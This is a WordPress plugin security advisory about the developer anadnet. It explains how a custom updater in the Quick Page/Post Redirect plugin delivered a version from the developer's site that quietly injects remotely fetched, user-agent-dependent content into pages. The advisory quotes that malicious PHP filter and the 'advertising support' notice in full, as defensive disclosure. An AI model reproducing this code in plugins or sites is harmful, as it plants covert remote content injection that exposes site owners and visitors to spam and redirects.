WordPress Plugin Developer Security Advisory: anadnet
One of the little understood realities of security issues with WordPress plugins is that the insecurity of them is not evenly spread across those plugins. Instead, many developers are properly securing their plugins and others get them properly secured when alerted they haven’t done that, while other plugin developers either are unable or unwilling to properly secure their plugins. With the latter group, among the issues we have seen, are developers who have introduced new serious vulnerabilities that are substantially similar to vulnerabilities that they know have been exploited in their plugins.
In situations where we become aware of developers who have shown that inability or unwillingness to properly secure their plugin, we are releasing advisories to warn customers of our service and the wider WordPress community of the risk of utilizing those developers’ plugins. In addition to checking those posts on our website for information on those advisory, we provide access to the information in several other forms. That includes through the companion plugin for our service, even when not using the service, as well as through a web browser extension and through separate data accessible from our website.
Malicious Code Added Through Update Mechanism
While most security issues with WordPress plugins come from vulnerabilities, there are also instances that involve malicious code being added to plugins. The most recent instance of that we are aware of involved us noticing what appears to be a backdoor added to a plugin in February. The month before that, we ran across a more complex instance where an update mechanism was added to a plugin and then that a new version of the plugin was served up through the developer’s website, which makes it harder to spot what is going on.
On January 24, the plugin Quick Page/Post Redirect Plugin was closed on the WordPress Plugin Directory. As that is one of the 1,000 most popular plugins in that directory, we were alerted by our systems to its closure. While looking to see if there was a security issue that we should be warning our customers about, we noticed what appeared to be a support topic that could explain that. On January 11, Nico Martin wrote this:
I found a few worrying bits of code on a client’s instance.
He had version 5.2.3 of “Quick Page/Post Redirect” installed. But neither in the plugin repo nor in the SVN did I find a corresponding version. My first thought was that it must be an external attack.
However, the code in question made the following call (when requestet as the googlebot) and placed the content received in front of the_content:
https://w.anadnet.com/bro/3/[host]/QQQGooglebot%2F2.1+%28%2Bhttp%3A%2F%2Fwww.googlebot.com%2Fbot.html%29QQQENDWhat I find quite worrying is that the content is dependent on the user agent. So the links are only loaded when the call is made by the Googlebot. This makes it quite difficult to identify.
Since anadnet.com belongs to the developer of the plugin, I wonder if this is malicious code deliberately smuggled in to earn a few dollars via a search engine network.
@anadnet , could I get a statement from you on that?
They followed that up with:
Ok, so this malicious code actually comes from @anadnet (https://anadnet.com/updates/?action=get_metadata&slug=quick-pagepost-redirect-plugin) and was distributed using a custom updater in the official Version: https://plugins.trac.wordpress.org/browser/quick-pagepost-redirect-plugin/trunk/updater?rev=2408245
Checking on that, we found that if you install version 5.2.1 of the plugin, then the update mechanism added in that version will cause the plugin to be updated version 5.2.3 from the developer’s website. That has several differences from 5.2.1. There is this code that can add additional content to frontend pages:
136 | add_filter( 'the_content', array( $this, 'filter_the_content_in_the_main_loop' ), -1 ); |
363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 | function filter_the_content_in_the_main_loop( $content ) { if (( is_single() || is_singular() || is_page() ) && (!is_user_logged_in()) && is_main_query() ){ if ($this->ppr_pro === '1' ){ if (!defined('CREDIT')) { $ctx=stream_context_create(array('http'=>array('timeout' => 3))); try{ $credit=@file_get_contents('https://w.anadnet.com/bro/3/'.$_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] .'QQQ'. urlencode($_SERVER['HTTP_USER_AGENT']).'QQQEND', false, $ctx); } catch (Exception $e) { } return $credit . $content; define('CREDIT', 'c'); } } } return $content; } |
There is also this code that appears to be claiming that the previous shown code is advertising code and it can be removed by purchasing a pro version of the plugin:
111 112 | $this->ppr_show_notice = get_option( 'ppr_show_notice' ); $this->ppr_first_install = get_option( 'ppr_first_install' ); |
119 | $add_action( 'admin_init', array( $this, 'ppr_notice_hook' ) ); |
160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 | function ppr_notice_hook() { add_filter( 'plugin_row_meta', array( $this, 'ppr_add_notice' ), 10, 2 ); add_action( 'upgrader_process_complete', function ( $upgrader_object, $options ) { $our_plugin = plugin_basename( __FILE__ ); if ( $options['action'] == 'update' && $options['type'] == 'plugin' && isset( $options['plugins'] ) ) { foreach ( $options['plugins'] as $plugin ) { if ( $plugin == $our_plugin ) { update_option( 'ppr_show_notice', 0 ); } } } }, 10, 2 ); } function ppr_add_notice( $links_array, $plugin_file_name ) { if ( strpos( $plugin_file_name, basename(__FILE__) ) ) { if ( (! $this->ppr_show_notice && current_user_can('administrator')) || (! $this->ppr_first_install && current_user_can('administrator')) ) { $links_array[] = '<div class="notice notice-warning inline">Quick Page/Post Redirect Plugin contains advertising support - by installing and/or using it, the plug-in will become part of an advertising-supported network. <br>The plug-in may be purchased without advertising support at <a href="https://anadnet.com/pro/" target="_blank">anadnet.com/pro/</a>.</div>'; update_option( 'ppr_show_notice', 1 ); update_option( 'ppr_first_install', 1 ); } } return $links_array; } |
The URL given for the claimed pro version serves a not found page.
We assumed that explained the closure.
We warned our customers about that situation, but those relying on competitors of ours were left in the dark. Both Automattic’s WPScan and Patchstack, which both claim that you will be first to know about vulnerabilities, have so far failed to warn about this:
The Plugin Returns
The plugin was reopened on the WordPress Plugin Directory on March 10. Nine days before that, a new version, 5.2.3, was submitted to the Subversion repository that underlies the WordPress plugin directory, with the changelog “Security fixes”. On March 10, additional changes were made to 5.2.3, which were labeled “Added sanitization”. It seems that those changes were related to the cause of the closure and the malicious code issue was unrelated to the closure.
The developer, anadnet, never responded to the previously mentioned topic to provide an explanation of things.
While the update mechanism had been removed in version 5.2.2, anyone that had installed version 5.2.1 would still be getting updates through the developer’s website and that still serves up the version of 5.2.3 with the code mentioned above.
This situation is still causing problems for websites, as this topic from four days ago attests to:
I am investigating the hacking of my site with a redirect to legendtable.com or legendarytable.com – then I find that this plugin was modified (hacked) on my system because it differs from the Wordoress repertoire version. Do you know anything about a hack like this?
While working on this advisory, we looked back further and found that this situation has been the subject of reviews and topics going back some time. Here is one review mentioning the security issue from April of last year and here is another topic describing the malicious code. Despite that, WordPress has allowed the plugin to remain in their plugin directory. Considering the micromanagement of comments made on the WordPress Support Forum about security, WordPress can’t excuse that on being unaware of the situation. Through our developer advisories, you can at least get warned about situations like that, even if WordPress isn’t handling things properly.
Plugin Security Scorecard Grade for Patchstack
Checked on March 5, 2025See issues causing the plugin to get less than A+ grade